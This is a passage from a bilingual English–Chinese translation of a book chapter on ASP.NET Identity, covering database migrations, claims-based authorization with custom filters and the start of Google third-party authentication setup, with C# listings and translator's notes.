x.City, new SelectList(Enum.GetNames(typeof(Cities))))</div><button class="btn btn-primary" type="submit">Save</button>} Listing 15-11 shows the corresponding change I made to the Home controller to update the Country property when the City value changes. 为了在City值变化时能够更新Country属性,清单15-11显示了我对Home控制器所做的相应修改。 Listing 15-11. Setting Custom Properties in the HomeController.cs File 清单15-11. 在HomeController.cs文件中设置自定义属性 using System.Web.Mvc;using System.Collections.Generic;using System.Web;using System.Security.Principal;using System.Threading.Tasks;using Users.Infrastructure;using Microsoft.AspNet.Identity;using Microsoft.AspNet.Identity.Owin;using Users.Models; namespace Users.Controllers {public class HomeController : Controller {// ...other action methods omitted for brevity...// ...出于简化,这里忽略了其他动作方法... [Authorize]public ActionResult UserProps() {return View(CurrentUser);}[Authorize][HttpPost]public async Task<ActionResult> UserProps(Cities city) {AppUser user = CurrentUser;user.City = city;user.SetCountryFromCity(city);await UserManager.UpdateAsync(user);return View(user);}// ...properties omitted for brevity...// ...出于简化,这里忽略了一些属性...} } 2. Performing the Migration 2. 准备迁移 All that remains is to create and apply a new migration. Enter the following command into the Package Manager Console: 剩下的事情就是创建和运用新的迁移了。在“Package Manager Console(包管理器控制台)”中输入以下命令: Add-Migration CountryProperty This will generate another file in the Migrations folder that contains the instruction to add the Country column. To apply the migration, execute the following command: 这将在Migrations文件夹中生成另一个文件,它含有添加Country数据表列的指令。为了运用迁移,可执行以下命令: Update-Database –TargetMigration CountryProperty The migration will be performed, and the value of the Country property will be set based on the value of the existing City property for each user. You can check the new user property by starting the application and authenticating and navigating to the /Home/UserProps URL, as shown in Figure 15-4. 这将执行迁移,Country属性的值将根据每个用户当前的City属性进行设置。通过启动应用程序,认证并导航到/Home/UserProps URL,便可以查看新的用户属性,如图15-4所示。 Figure 15-4. Creating an additional user property 图15-4. 创建附加用户属性 Tip Although I am focused on the process of upgrading the database, you can also migrate back to a previous version by specifying an earlier migration. Use the –Force argument make changes that cause data loss, such as removing a column. 提示:虽然我们关注了升级数据库的过程,但你也可以回退到以前的版本,只需指定一个早期的迁移即可。使用-Force参数进行修改,会引起数据丢失,例如删除数据表列。 15.3 Working with Claims 15.3 使用声明(Claims) In older user-management systems, such as ASP.NET Membership, the application was assumed to be the authoritative source of all information about the user, essentially treating the application as a closed world and trusting the data that is contained within it. 在旧的用户管理系统中,例如ASP.NET Membership,应用程序被假设成是用户所有信息的权威来源,本质上将应用程序视为是一个封闭的世界,并且只信任其中所包含的数据。 This is such an ingrained approach to software development that it can be hard to recognize that’s what is happening, but you saw an example of the closed-world technique in Chapter 14 when I authenticated users against the credentials stored in the database and granted access based on the roles associated with those credentials. I did the same thing again in this chapter when I added properties to the user class. Every piece of information that I needed to manage user authentication and authorization came from within my application—and that is a perfectly satisfactory approach for many web applications, which is why I demonstrated these techniques in such depth. 这是软件开发的一种根深蒂固的方法,使人很难认识到这到底意味着什么,第14章你已看到了这种封闭世界技术的例子,根据存储在数据库中的凭据来认证用户,并根据与凭据关联在一起的角色来授权访问。本章前述在用户类上添加属性,也做了同样的事情。我管理用户认证与授权所需的每一个数据片段都来自于我的应用程序——而且这是许多Web应用程序都相当满意的一种方法,这也是我如此深入地演示这些技术的原因。 ASP.NET Identity also supports an alternative approach for dealing with users, which works well when the MVC framework application isn’t the sole source of information about users and which can be used to authorize users in more flexible and fluid ways than traditional roles allow. ASP.NET Identity还支持另一种处理用户的办法,当MVC框架的应用程序不是有关用户的唯一信息源时,这种办法会工作得很好,而且能够比传统的角色授权更为灵活且流畅的方式进行授权。 This alternative approach uses claims, and in this section I’ll describe how ASP.NET Identity supports claims-based authorization. Table 15-4 puts claims in context. 这种可选的办法使用了“Claims(声明)”,因此在本小节中,我将描述ASP.NET Identity如何支持“Claims-Based Authorization(基于声明的授权)”。表15-4描述了声明(Claims)的情形。 提示:“Claim”在英文字典中不完全是“声明”的意思,根据本文的描述,感觉把它说成“声明”也不一定合适,所以在之后的译文中基本都写成中英文并用的形式,即“声明(Claims)”。根据表15-4中的声明(Claims)的定义:声明(Claims)是关于用户的一些信息片段。一个用户的信息片段当然有很多,每一个信息片段就是一项声明(Claim),用户的所有信息片段合起来就是该用户的声明(Claims)。请读者注意该单词的单复数形式——译者注 Table 15-4. Putting Claims in Context 表15-4. 声明(Claims)的情形 Question 问题 Answer 答案 What is it? 什么是声明(Claims)? Claims are pieces of information about users that you can use to make authorization decisions. Claims can be obtained from external systems as well as from the local Identity database. 声明(Claims)是关于用户的一些信息片段,可以用它们做出授权决定。声明(Claims)可以从外部系统获取,也可以从本地的Identity数据库获取。 Why should I care? 为何要关心它? Claims can be used to flexibly authorize access to action methods. Unlike conventional roles, claims allow access to be driven by the information that describes the user. 声明(Claims)可以用来对动作方法进行灵活的授权访问。与传统的角色不同,声明(Claims)让访问能够由描述用户的信息进行驱动。 How is it used by the MVC framework? 如何在MVC框架中使用它? This feature isn’t used directly by the MVC framework, but it is integrated into the standard authorization features, such as the Authorize attribute. 这不是直接由MVC框架使用的特性,但它集成到了标准的授权特性之中,例如Authorize注解属性。 Tip you don’t have to use claims in your applications, and as Chapter 14 showed, ASP.NET Identity is perfectly happy providing an application with the authentication and authorization services without any need to understand claims at all. 提示:你在应用程序中不一定要使用声明(Claims),正如第14章所展示的那样,ASP.NET Identity能够为应用程序提供充分的认证与授权服务,而根本不需要理解声明(Claims)。 15.3.1 Understanding Claims 15.3.1 理解声明(Claims) A claim is a piece of information about the user, along with some information about where the information came from. The easiest way to unpack claims is through some practical demonstrations, without which any discussion becomes too abstract to be truly useful. To get started, I added a Claims controller to the example project, the definition of which you can see in Listing 15-12. 一项声明(Claim)是关于用户的一个信息片段(请注意这个英文单词的单复数形式——译者注),并伴有该片段出自何处的某种信息。揭开声明(Claims)含义最容易的方式是做一些实际演示,任何讨论都会过于抽象根本没有真正的用处。为此,我在示例项目中添加了一个Claims控制器,其定义如清单15-12所示。 Listing 15-12. The Contents of the ClaimsController.cs File 清单15-12. ClaimsController.cs文件的内容 using System.Security.Claims;using System.Web;using System.Web.Mvc; namespace Users.Controllers {public class ClaimsController : Controller {[Authorize]public ActionResult Index() {ClaimsIdentity ident = HttpContext.User.Identity as ClaimsIdentity;if (ident == null) {return View("Error", new string[] { "No claims available" });} else {return View(ident.Claims);} }} } Tip You may feel a little lost as I define the code for this example. Don’t worry about the details for the moment—just stick with it until you see the output from the action method and view that I define. More than anything else, that will help put claims into perspective. 提示:你或许会对我为此例定义的代码感到有点失望。此刻对此细节不必着急——只要稍事忍耐,当看到该动作方法和视图的输出便会明白。尤为重要的是,这有助于洞察声明(Claims)。 You can get the claims associated with a user in different ways. One approach is to use the Claims property defined by the user class, but in this example, I have used the HttpContext.User.Identity property to demonstrate the way that ASP.NET Identity is integrated with the rest of the ASP.NET platform. As I explained in Chapter 13, the HttpContext.User.Identity property returns an implementation of the IIdentity interface, which is a ClaimsIdentity object when working using ASP.NET Identity. The ClaimsIdentity class is defined in the System.Security.Claims namespace, and Table 15-5 shows the members it defines that are relevant to this chapter. 可以通过不同的方式获得与用户相关联的声明(Claims)。方法之一就是使用由用户类定义的Claims属性,但在这个例子中,我使用了HttpContext.User.Identity属性,目的是演示ASP.NET Identity与ASP.NET平台集成的方式(请注意这句话所表示的含义:用户类的Claims属性属于ASP.NET Identity,而HttpContext.User.Identity属性则属于ASP.NET平台。由此可见,ASP.NET Identity已经融合到了ASP.NET平台之中——译者注)。正如第13章所解释的那样,HttpContext.User.Identity属性返回IIdentity的接口实现,当使用ASP.NET Identity时,该实现是一个ClaimsIdentity对象。ClaimsIdentity类是在System.Security.Claims命名空间中定义的,表15-5显示了它所定义的与本章有关的成员。 Table 15-5. The Members Defined by the ClaimsIdentity Class 表15-5. ClaimsIdentity类所定义的成员 Name 名称 Description 描述 Claims Returns an enumeration of Claim objects representing the claims for the user. 返回表示用户声明(Claims)的Claim对象枚举 AddClaim(claim) Adds a claim to the user identity. 给用户添加一个声明(Claim) AddClaims(claims) Adds an enumeration of Claim objects to the user identity. 给用户添加Claim对象的枚举。 HasClaim(predicate) Returns true if the user identity contains a claim that matches the specified predicate. See the “Applying Claims” section for an example predicate. 如果用户含有与指定谓词匹配的声明(Claim)时,返回true。参见“运用声明(Claims)”中的示例谓词 RemoveClaim(claim) Removes a claim from the user identity. 删除用户的声明(Claim)。 Other members are available, but the ones in the table are those that are used most often in web applications, for reason that will become obvious as I demonstrate how claims fit into the wider ASP.NET platform. 还有一些可用的其它成员,但表中的这些是在Web应用程序中最常用的,随着我演示如何将声明(Claims)融入更宽泛的ASP.NET平台,它们为什么最常用就很显然了。 In Listing 15-12, I cast the IIdentity implementation to the ClaimsIdentity type and pass the enumeration of Claim objects returned by the ClaimsIdentity.Claims property to the View method. A Claim object represents a single piece of data about the user, and the Claim class defines the properties shown in Table 15-6. 在清单15-12中,我将IIdentity实现转换成了ClaimsIdentity类型,并且给View方法传递了ClaimsIdentity.Claims属性所返回的Claim对象的枚举。Claim对象所示表示的是关于用户的一个单一的数据片段,Claim类定义的属性如表15-6所示。 Table 15-6. The Properties Defined by the Claim Class 表15-6. Claim类定义的属性 Name 名称 Description 描述 Issuer Returns the name of the system that provided the claim 返回提供声明(Claim)的系统名称 Subject Returns the ClaimsIdentity object for the user who the claim refers to 返回声明(Claim)所指用户的ClaimsIdentity对象 Type Returns the type of information that the claim represents 返回声明(Claim)所表示的信息类型 Value Returns the piece of information that the claim represents 返回声明(Claim)所表示的信息片段 Listing 15-13 shows the contents of the Index.cshtml file that I created in the Views/Claims folder and that is rendered by the Index action of the Claims controller. The view adds a row to a table for each claim about the user. 清单15-13显示了我在Views/Claims文件夹中创建的Index.cshtml文件的内容,它由Claims控制器中的Index动作方法进行渲染。该视图为用户的每项声明(Claim)添加了一个表格行。 Listing 15-13. The Contents of the Index.cshtml File in the Views/Claims Folder 清单15-13. Views/Claims文件夹中Index.cshtml文件的内容 @using System.Security.Claims@using Users.Infrastructure@model IEnumerable<Claim>@{ ViewBag.Title = "Claims"; }<div class="panel panel-primary"><div class="panel-heading">Claims</div><table class="table table-striped"><tr><th>Subject</th><th>Issuer</th><th>Type</th><th>Value</th></tr>@foreach (Claim claim in Model.OrderBy(x => x.Type)) {<tr><td>@claim.Subject.Name</td><td>@claim.Issuer</td><td>@Html.ClaimType(claim.Type)</td><td>@claim.Value</td></tr>}</table></div> The value of the Claim.Type property is a URI for a Microsoft schema, which isn’t especially useful. The popular schemas are used as the values for fields in the System.Security.Claims.ClaimTypes class, so to make the output from the Index.cshtml view easier to read, I added an HTML helper to the IdentityHelpers.cs file, as shown in Listing 15-14. It is this helper that I use in the Index.cshtml file to format the value of the Claim.Type property. Claim.Type属性的值是一个微软模式(Microsoft Schema)的URI(统一资源标识符),这是特别有用的。System.Security.Claims.ClaimTypes类中字段的值使用的是流行模式(Popular Schema),因此为了使Index.cshtml视图的输出更易于阅读,我在IdentityHelpers.cs文件中添加了一个HTML辅助器,如清单15-14所示。Index.cshtml文件正是使用这个辅助器格式化了Claim.Type属性的值。 Listing 15-14. Adding a Helper to the IdentityHelpers.cs File 清单15-14. 在IdentityHelpers.cs文件中添加辅助器 using System.Web;using System.Web.Mvc;using Microsoft.AspNet.Identity.Owin;using System;using System.Linq;using System.Reflection;using System.Security.Claims;namespace Users.Infrastructure {public static class IdentityHelpers {public static MvcHtmlString GetUserName(this HtmlHelper html, string id) {AppUserManager mgr= HttpContext.Current.GetOwinContext().GetUserManager<AppUserManager>();return new MvcHtmlString(mgr.FindByIdAsync(id).Result.UserName);} public static MvcHtmlString ClaimType(this HtmlHelper html, string claimType) {FieldInfo[] fields = typeof(ClaimTypes).GetFields();foreach (FieldInfo field in fields) {if (field.GetValue(null).ToString() == claimType) {return new MvcHtmlString(field.Name);} }return new MvcHtmlString(string.Format("{0}",claimType.Split('/', '.').Last()));} }} Note The helper method isn’t at all efficient because it reflects on the fields of the ClaimType class for each claim that is displayed, but it is sufficient for my purposes in this chapter. You won’t often need to display the claim type in real applications. 注:该辅助器并非十分有效,因为它只是针对每个要显示的声明(Claim)映射出ClaimType类的字段,但对我要的目的已经足够了。在实际项目中不会经常需要显示声明(Claim)的类型。 To see why I have created a controller that uses claims without really explaining what they are, start the application, authenticate as the user Alice (with the password MySecret), and request the /Claims/Index URL. Figure 15-5 shows the content that is generated. 为了弄明白我为何要先创建一个使用声明(Claims)的控制器,而没有真正解释声明(Claims)是什么的原因,可以启动应用程序,以用户Alice进行认证(其口令是MySecret),并请求/Claims/Index URL。图15-5显示了生成的内容。 Figure 15-5. The output from the Index action of the Claims controller 图15-5. Claims控制器中Index动作的输出 It can be hard to make out the detail in the figure, so I have reproduced the content in Table 15-7. 这可能还难以认识到此图的细节,为此我在表15-7中重列了其内容。 Table 15-7. The Data Shown in Figure 15-5 表15-7. 图15-5中显示的数据 Subject(科目) Issuer(发行者) Type(类型) Value(值) Alice LOCAL AUTHORITY SecurityStamp Unique ID Alice LOCAL AUTHORITY IdentityProvider ASP.NET Identity Alice LOCAL AUTHORITY Role Employees Alice LOCAL AUTHORITY Role Users Alice LOCAL AUTHORITY Name Alice Alice LOCAL AUTHORITY NameIdentifier Alice’s user ID The table shows the most important aspect of claims, which is that I have already been using them when I implemented the traditional authentication and authorization features in Chapter 14. You can see that some of the claims relate to user identity (the Name claim is Alice, and the NameIdentifier claim is Alice’s unique user ID in my ASP.NET Identity database). 此表展示了声明(Claims)最重要的方面,这些是我在第14章中实现传统的认证和授权特性时,一直在使用的信息。可以看出,有些声明(Claims)与用户标识有关(Name声明是Alice,NameIdentifier声明是Alice在ASP.NET Identity数据库中的唯一用户ID号)。 Other claims show membership of roles—there are two Role claims in the table, reflecting the fact that Alice is assigned to both the Users and Employees roles. There is also a claim about how Alice has been authenticated: The IdentityProvider is set to ASP.NET Identity. 其他声明(Claims)显示了角色成员——表中有两个Role声明(Claim),体现出Alice被赋予了Users和Employees两个角色这一事实。还有一个是Alice已被认证的声明(Claim):IdentityProvider被设置到了ASP.NET Identity。 The difference when this information is expressed as a set of claims is that you can determine where the data came from. The Issuer property for all the claims shown in the table is set to LOCAL AUTHORITY, which indicates that the user’s identity has been established by the application. 当这种信息被表示成一组声明(Claims)时的差别是,你能够确定这些数据是从哪里来的。表中所显示的所有声明的Issuer属性(发布者)都被设置到了LOACL AUTHORITY(本地授权),这说明该用户的标识是由应用程序建立的。 So, now that you have seen some example claims, I can more easily describe what a claim is. A claim is any piece of information about a user that is available to the application, including the user’s identity and role memberships. And, as you have seen, the information I have been defining about my users in earlier chapters is automatically made available as claims by ASP.NET Identity. 因此,现在你已经看到了一些声明(Claims)示例,我可以更容易地描述声明(Claim)是什么了。一项声明(Claim)是可用于应用程序中的有关用户的一个信息片段,包括用户的标识以及角色成员等。而且,正如你所看到的,我在前几章定义的关于用户的信息,被ASP.NET Identity自动地作为声明(Claims)了。 15.3.2 Creating and Using Claims 15.3.2 创建和使用声明(Claims) Claims are interesting for two reasons. The first reason is that an application can obtain claims from multiple sources, rather than just relying on a local database for information about the user. You will see a real example of this when I show you how to authenticate users through a third-party system in the “Using Third-Party Authentication” section, but for the moment I am going to add a class to the example project that simulates a system that provides claims information. Listing 15-15 shows the contents of the LocationClaimsProvider.cs file that I added to the Infrastructure folder. 声明(Claims)比较有意思的原因有两个。第一个原因是应用程序可以从多个来源获取声明(Claims),而不是只能依靠本地数据库关于用户的信息。你将会看到一个实际的示例,在“使用第三方认证”小节中,将演示如何通过第三方系统来认证用户。不过,此刻我只打算在示例项目中添加一个类,用以模拟一个提供声明(Claims)信息的系统。清单15-15显示了我添加到Infrastructure文件夹中LocationClaimsProvider.cs文件的内容。 Listing 15-15. The Contents of the LocationClaimsProvider.cs File 清单15-15. LocationClaimsProvider.cs文件的内容 using System.Collections.Generic;using System.Security.Claims; namespace Users.Infrastructure {public static class LocationClaimsProvider {public static IEnumerable<Claim> GetClaims(ClaimsIdentity user) {List<Claim> claims = new List<Claim>();if (user.Name.ToLower() == "alice") {claims.Add(CreateClaim(ClaimTypes.PostalCode, "DC 20500"));claims.Add(CreateClaim(ClaimTypes.StateOrProvince, "DC"));} else {claims.Add(CreateClaim(ClaimTypes.PostalCode, "NY 10036"));claims.Add(CreateClaim(ClaimTypes.StateOrProvince, "NY"));}return claims;}private static Claim CreateClaim(string type, string value) {return new Claim(type, value, ClaimValueTypes.String, "RemoteClaims");} }} The GetClaims method takes a ClaimsIdentity argument and uses the Name property to create claims about the user’s ZIP code and state. This class allows me to simulate a system such as a central HR database, which would be the authoritative source of location information about staff, for example. GetClaims方法以ClaimsIdentity为参数,并使用Name属性创建了关于用户ZIP码(邮政编码)和州府的声明(Claims)。上述这个类使我能够模拟一个诸如中心化的HR数据库(人力资源数据库)之类的系统,它可能会成为全体职员的地点信息的权威数据源。 Claims are associated with the user’s identity during the authentication process, and Listing 15-16 shows the changes I made to the Login action method of the Account controller to call the LocationClaimsProvider class. 在认证过程期间,声明(Claims)是与用户标识关联在一起的,清单15-16显示了我对Account控制器中Login动作方法所做的修改,以便调用LocationClaimsProvider类。 Listing 15-16. Associating Claims with a User in the AccountController.cs File 清单15-16. AccountController.cs文件中用户用声明的关联 ...[HttpPost][AllowAnonymous][ValidateAntiForgeryToken]public async Task<ActionResult> Login(LoginModel details, string returnUrl) {if (ModelState.IsValid) {AppUser user = await UserManager.FindAsync(details.Name,details.Password);if (user == null) {ModelState.AddModelError("", "Invalid name or password.");} else {ClaimsIdentity ident = await UserManager.CreateIdentityAsync(user,DefaultAuthenticationTypes.ApplicationCookie); ident.AddClaims(LocationClaimsProvider.GetClaims(ident));AuthManager.SignOut();AuthManager.SignIn(new AuthenticationProperties {IsPersistent = false}, ident);return Redirect(returnUrl);} }ViewBag.returnUrl = returnUrl;return View(details);}... You can see the effect of the location claims by starting the application, authenticating as a user, and requesting the /Claim/Index URL. Figure 15-6 shows the claims for Alice. You may have to sign out and sign back in again to see the change. 为了看看这个地点声明(Claims)的效果,可以启动应用程序,以一个用户进行认证,并请求/Claim/Index URL。图15-6显示了Alice的声明(Claims)。你可能需要退出,然后再次登录才会看到发生的变化。 Figure 15-6. Defining additional claims for users 图15-6. 定义用户的附加声明 Obtaining claims from multiple locations means that the application doesn’t have to duplicate data that is held elsewhere and allows integration of data from external parties. The Claim.Issuer property tells you where a claim originated from, which helps you judge how accurate the data is likely to be and how much weight you should give the data in your application. Location data obtained from a central HR database is likely to be more accurate and trustworthy than data obtained from an external mailing list provider, for example. 从多个地点获取声明(Claims)意味着应用程序不必复制其他地方保持的数据,并且能够与外部的数据集成。Claim.Issuer属性(图15-6中的Issuer数据列——译者注)能够告诉你一个声明(Claim)的发源地,这有助于让你判断数据的精确程度,也有助于让你决定这类数据在应用程序中的权重。例如,从中心化的HR数据库获取的地点数据可能要比外部邮件列表提供器获取的数据更为精确和可信。 1. Applying Claims 1. 运用声明(Claims) The second reason that claims are interesting is that you can use them to manage user access to your application more flexibly than with standard roles. The problem with roles is that they are static, and once a user has been assigned to a role, the user remains a member until explicitly removed. This is, for example, how long-term employees of big corporations end up with incredible access to internal systems: They are assigned the roles they require for each new job they get, but the old roles are rarely removed. (The unexpectedly broad systems access sometimes becomes apparent during the investigation into how someone was able to ship the contents of the warehouse to their home address—true story.) 声明(Claims)有意思的第二个原因是,你可以用它们来管理用户对应用程序的访问,这要比标准的角色管理更为灵活。角色的问题在于它们是静态的,而且一旦用户已经被赋予了一个角色,该用户便是一个成员,直到明确地删除为止。例如,这意味着大公司的长期雇员,对内部系统的访问会十分惊人:他们每次在获得新工作时,都会赋予所需的角色,但旧角色很少被删除。(在调查某人为何能够将仓库里的东西发往他的家庭地址过程中发现,有时会出现异常宽泛的系统访问——真实的故事) Claims can be used to authorize users based directly on the information that is known about them, which ensures that the authorization changes when the data changes. The simplest way to do this is to generate Role claims based on user data that are then used by controllers to restrict access to action methods. Listing 15-17 shows the contents of the ClaimsRoles.cs file that I added to the Infrastructure. 声明(Claims)可以直接根据用户已知的信息对用户进行授权,这能够保证当数据发生变化时,授权也随之而变。此事最简单的做法是根据用户数据来生成Role声明(Claim),然后由控制器用来限制对动作方法的访问。清单15-17显示了我添加到Infrastructure中的ClaimsRoles.cs文件的内容。 Listing 15-17. The Contents of the ClaimsRoles.cs File 清单15-17. ClaimsRoles.cs文件的内容 using System.Collections.Generic;using System.Security.Claims; namespace Users.Infrastructure {public class ClaimsRoles {public static IEnumerable<Claim> CreateRolesFromClaims(ClaimsIdentity user) {List<Claim> claims = new List<Claim>();if (user.HasClaim(x => x.Type == ClaimTypes.StateOrProvince&& x.Issuer == "RemoteClaims" && x.Value == "DC")&& user.HasClaim(x => x.Type == ClaimTypes.Role&& x.Value == "Employees")) {claims.Add(new Claim(ClaimTypes.Role, "DCStaff"));}return claims;} }} The gnarly looking CreateRolesFromClaims method uses lambda expressions to determine whether the user has a StateOrProvince claim from the RemoteClaims issuer with a value of DC and a Role claim with a value of Employees. If the user has both claims, then a Role claim is returned for the DCStaff role. Listing 15-18 shows how I call the CreateRolesFromClaims method from the Login action in the Account controller. CreateRolesFromClaims是一个粗糙的考察方法,它使用了Lambda表达式,以检查用户是否具有StateOrProvince声明(Claim),该声明来自于RemoteClaims发行者(Issuer),值为DC。也检查用户是否具有Role声明(Claim),其值为Employees。如果用户这两个声明都有,那么便返回一个DCStaff角色的Role声明。清单15-18显示了如何在Account控制器中的Login动作中调用CreateRolesFromClaims方法。 Listing 15-18. Generating Roles Based on Claims in the AccountController.cs File 清单15-18. 在AccountController.cs中根据声明生成角色 ...[HttpPost][AllowAnonymous][ValidateAntiForgeryToken]public async Task<ActionResult> Login(LoginModel details, string returnUrl) {if (ModelState.IsValid) {AppUser user = await UserManager.FindAsync(details.Name,details.Password);if (user == null) {ModelState.AddModelError("", "Invalid name or password.");} else {ClaimsIdentity ident = await UserManager.CreateIdentityAsync(user,DefaultAuthenticationTypes.ApplicationCookie);ident.AddClaims(LocationClaimsProvider.GetClaims(ident)); ident.AddClaims(ClaimsRoles.CreateRolesFromClaims(ident));AuthManager.SignOut();AuthManager.SignIn(new AuthenticationProperties {IsPersistent = false}, ident);return Redirect(returnUrl);} }ViewBag.returnUrl = returnUrl;return View(details);}... I can then restrict access to an action method based on membership of the DCStaff role. Listing 15-19 shows a new action method I added to the Claims controller to which I have applied the Authorize attribute. 然后我可以根据DCStaff角色的成员,来限制对一个动作方法的访问。清单15-19显示了在Claims控制器中添加的一个新的动作方法,在该方法上已经运用了Authorize注解属性。 Listing 15-19. Adding a New Action Method to the ClaimsController.cs File 清单15-19. 在ClaimsController.cs文件中添加一个新的动作方法 using System.Security.Claims;using System.Web;using System.Web.Mvc;namespace Users.Controllers {public class ClaimsController : Controller {[Authorize]public ActionResult Index() {ClaimsIdentity ident = HttpContext.User.Identity as ClaimsIdentity;if (ident == null) {return View("Error", new string[] { "No claims available" });} else {return View(ident.Claims);} } [Authorize(Roles="DCStaff")]public string OtherAction() {return "This is the protected action";} }} Users will be able to access OtherAction only if their claims grant them membership to the DCStaff role. Membership of this role is generated dynamically, so a change to the user’s employment status or location information will change their authorization level. 只要用户的声明(Claims)承认他们是DCStaff角色的成员,那么他们便能访问OtherAction动作。该角色的成员是动态生成的,因此,若是用户的雇用状态或地点信息发生变化,也会改变他们的授权等级。 提示:请读者从这个例子中吸取其中的思想精髓。对于读物的理解程度,仁者见仁,智者见智,能领悟多少,全凭各人,译者感觉这里的思想有无数的可能。举例说明:(1)可以根据用户的身份进行授权,比如学生在校时是“学生”,毕业后便是“校友”;(2)可以根据用户所处的部门进行授权,人事部用户属于人事团队,销售部用户属于销售团队,各团队有其自己的应用;(3)下一小节的示例是根据用户的地点授权。简言之:一方面用户的各种声明(Claim)都可以用来进行授权;另一方面用户的声明(Claim)又是可以自定义的。于是可能的运用就无法估计了。总之一句话,这种基于声明的授权(Claims-Based Authorization)有无限可能!要是没有我这里的提示,是否所有读者在此处都会有所体会?——译者注 15.3.3 Authorizing Access Using Claims 15.3.3 使用声明(Claims)授权访问 The previous example is an effective demonstration of how claims can be used to keep authorizations fresh and accurate, but it is a little indirect because I generate roles based on claims data and then enforce my authorization policy based on the membership of that role. A more direct and flexible approach is to enforce authorization directly by creating a custom authorization filter attribute. Listing 15-20 shows the contents of the ClaimsAccessAttribute.cs file, which I added to the Infrastructure folder and used to create such a filter. 前面的示例有效地演示了如何用声明(Claims)来保持新鲜和准确的授权,但有点不太直接,因为我要根据声明(Claims)数据来生成了角色,然后强制我的授权策略基于角色成员。一个更直接且灵活的办法是直接强制授权,其做法是创建一个自定义的授权过滤器注解属性。清单15-20演示了ClaimsAccessAttribute.cs文件的内容,我将它添加在Infrastructure文件夹中,并用它创建了这种过滤器。 Listing 15-20. The Contents of the ClaimsAccessAttribute.cs File 清单15-20. ClaimsAccessAttribute.cs文件的内容 using System.Security.Claims;using System.Web;using System.Web.Mvc; namespace Users.Infrastructure {public class ClaimsAccessAttribute : AuthorizeAttribute {public string Issuer { get; set; }public string ClaimType { get; set; }public string Value { get; set; }protected override bool AuthorizeCore(HttpContextBase context) {return context.User.Identity.IsAuthenticated&& context.User.Identity is ClaimsIdentity&& ((ClaimsIdentity)context.User.Identity).HasClaim(x =>x.Issuer == Issuer && x.Type == ClaimType && x.Value == Value);} }} The attribute I have defined is derived from the AuthorizeAttribute class, which makes it easy to create custom authorization policies in MVC framework applications by overriding the AuthorizeCore method. My implementation grants access if the user is authenticated, the IIdentity implementation is an instance of ClaimsIdentity, and the user has a claim with the issuer, type, and value matching the class properties. Listing 15-21 shows how I applied the attribute to the Claims controller to authorize access to the OtherAction method based on one of the location claims created by the LocationClaimsProvider class. 我所定义的这个注解属性派生于AuthorizeAttribute类,通过重写AuthorizeCore方法,很容易在MVC框架应用程序中创建自定义的授权策略。在这个实现中,若用户是已认证的、其IIdentity实现是一个ClaimsIdentity实例,而且该用户有一个带有issuer、type以及value的声明(Claim),它们与这个类的属性是匹配的,则该用户便是允许访问的。清单15-21显示了如何将这个注解属性运用于Claims控制器,以便根据LocationClaimsProvider类创建的地点声明(Claim),对OtherAction方法进行授权访问。 Listing 15-21. Performing Authorization on Claims in the ClaimsController.cs File 清单15-21. 在ClaimsController.cs文件中执行基于声明的授权 using System.Security.Claims;using System.Web;using System.Web.Mvc;using Users.Infrastructure;namespace Users.Controllers {public class ClaimsController : Controller {[Authorize]public ActionResult Index() {ClaimsIdentity ident = HttpContext.User.Identity as ClaimsIdentity;if (ident == null) {return View("Error", new string[] { "No claims available" });} else {return View(ident.Claims);} } [ClaimsAccess(Issuer="RemoteClaims", ClaimType=ClaimTypes.PostalCode,Value="DC 20500")]public string OtherAction() {return "This is the protected action";} }} My authorization filter ensures that only users whose location claims specify a ZIP code of DC 20500 can invoke the OtherAction method. 这个授权过滤器能够确保只有地点声明(Claim)的邮编为DC 20500的用户才能请求OtherAction方法。 15.4 Using Third-Party Authentication 15.4 使用第三方认证 One of the benefits of a claims-based system such as ASP.NET Identity is that any of the claims can come from an external system, even those that identify the user to the application. This means that other systems can authenticate users on behalf of the application, and ASP.NET Identity builds on this idea to make it simple and easy to add support for authenticating users through third parties such as Microsoft, Google, Facebook, and Twitter. 基于声明的系统,如ASP.NET Identity,的好处之一是任何声明都可以来自于外部系统,即使是将用户标识到应用程序的那些声明。这意味着其他系统可以代表应用程序来认证用户,而ASP.NET Identity就建立在这样的思想之上,使之能够简单而方便地添加第三方认证用户的支持,如微软、Google、Facebook、Twitter等。 There are some substantial benefits of using third-party authentication: Many users will already have an account, users can elect to use two-factor authentication, and you don’t have to manage user credentials in the application. In the sections that follow, I’ll show you how to set up and use third-party authentication for Google users, which Table 15-8 puts into context. 使用第三方认证有一些实际的好处:许多用户已经有了账号、用户可以选择使用双因子认证、你不必在应用程序中管理用户凭据等等。在以下小节中,我将演示如何为Google用户建立并使用第三方认证,表15-8描述了事情的情形。 Table 15-8. Putting Third-Party Authentication in Context 表15-8. 第三方认证情形 Question 问题 Answer 回答 What is it? 什么是第三方认证? Authenticating with third parties lets you take advantage of the popularity of companies such as Google and Facebook. 第三方认证使你能够利用流行公司,如Google和Facebook,的优势。 Why should I care? 为何要关心它? Users don’t like having to remember passwords for many different sites. Using a provider with large-scale adoption can make your application more appealing to users of the provider’s services. 用户不喜欢记住许多不同网站的口令。使用大范围适应的提供器可使你的应用程序更吸引有提供器服务的用户。 How is it used by the MVC framework? 如何在MVC框架中使用它? This feature isn’t used directly by the MVC framework. 这不是一个直接由MVC框架使用的特性。 Note The reason I have chosen to demonstrate Google authentication is that it is the only option that doesn’t require me to register my application with the authentication service. You can get details of the registration processes required at http://bit.ly/1cqLTrE. 提示:我选择演示Google认证的原因是,它是唯一不需要在其认证服务中注册我应用程序的公司。有关认证服务注册过程的细节,请参阅http://bit.ly/1cqLTrE。 15.4.1 Enabling Google Authentication 15.4.1 启用Google认证 ASP.NET Identity comes with built-in support for authenticating users through their Microsoft, Google, Facebook, and Twitter accounts as well more general support for any authentication service that supports OAuth. The first step is to add the NuGet package that includes the Google-specific additions for ASP.NET Identity. Enter the following command into the Package Manager Console: ASP.NET Identity带有通过Microsoft、Google、Facebook以及Twitter账号认证用户的内建支持,并且对于支持OAuth的认证服务具有更普遍的支持。第一个步骤是添加NuGet包,包中含有用于ASP.NET Identity的Google专用附件。请在“Package Manager Console(包管理器控制台)”中输入以下命令: Install-Package Microsoft.Owin.Security.Google -version 2.0.2 There are NuGet packages for each of the services that ASP.NET Identity supports, as described in Table 15-9. 对于ASP.NET Identity支持的每一种服务都有相应的NuGet包,如表15-9所示。 Table 15-9. The NuGet Authenticaton Packages 表15-9. NuGet认证包 Name 名称 Description 描述 Microsoft.Owin.Security.Google Authenticates users with Google accounts 用Google账号认证用户 Microsoft.Owin.Security.Facebook Authenticates users with Facebook accounts 用Facebook账号认证用户 